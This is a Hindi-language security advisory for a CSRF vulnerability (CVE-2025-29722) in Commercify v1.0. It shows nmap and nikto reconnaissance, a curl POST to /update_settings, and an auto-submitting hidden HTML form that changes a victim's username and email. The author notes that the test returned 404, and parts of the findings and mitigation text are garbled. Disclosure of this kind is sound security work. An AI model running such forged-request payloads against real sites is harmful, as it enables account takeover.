
Commercify v1.0 में Cross Site Request Forgery (CSRF)
द्वारा खोजा गया: David P.S Abraham (उर्फ Davycipher)
CVE-2025-29722 को MITRE Corporation द्वारा यह भेद्यता निर्धारित की गई है।
एक CSRF भेद्यता की पहचान Commercify v1.0 में की गई, जो @yassmittal द्वारा विकसित एक ओपन-सोर्स ई-कॉमर्स प्लेटफॉर्म है। एप्लिकेशन में महत्वपूर्ण एंडपॉइंट्स जैसे /update_settings पर उचित CSRF सुरक्षा तंत्र का अभाव है, जिससे हमलावर दुर्भावनापूर्ण अनुरोध तैयार कर सकते हैं जो किसी अन्य डोमेन से निष्पादित होने पर उपयोगकर्ता डेटा को संशोधित कर सकते हैं।
nmap स्कैन ने खुलासा किया कि सेवा पोर्ट 5173 के माध्यम से सुलभ थी, जो एक संभावित विकास सर्वर का संकेत देता है।
nmap -p 5173 localhost
इसके बाद, मैंने nikto का उपयोग करके ऐप को स्कैन किया, जिससे पता चला:
X-Frame-Options हेडरAccess-Control-Allow-Origin: *)एप्लिकेशन की खोज करते समय, मुझे यूजर डैशबोर्ड सुविधाओं के आधार पर एक संभावित update_settings एंडपॉइंट का संदेह हुआ। मैंने इसे इस प्रकार परीक्षण किया:
curl -X POST "http://localhost:5173/update_settings" \
-d "username=attacker&[email protected]"
हालांकि 404 Not Found लौटाया गया, यह व्यवहार पर्यावरण पर निर्भर हो सकता है। मान्य डिप्लॉयमेंट पर, इससे पूर्ण खाता हेरफेर हो सकता है।
CSRF दोष का शोषण करने के लिए HTML-आधारित हमला:
<form action="http://localhost:5173/update_settings" method="POST">
<input type="hidden" name="username" value="attacker">
<input type="hidden" name="email" value="[email protected]">
</form>
<script>
document.forms[0].submit();
</script>
SameSite कुकी विशेषता नहीं*)SameSite=Strict या Lax सेट करेंDavid P.S. Abraham
उपनाम: Davycipher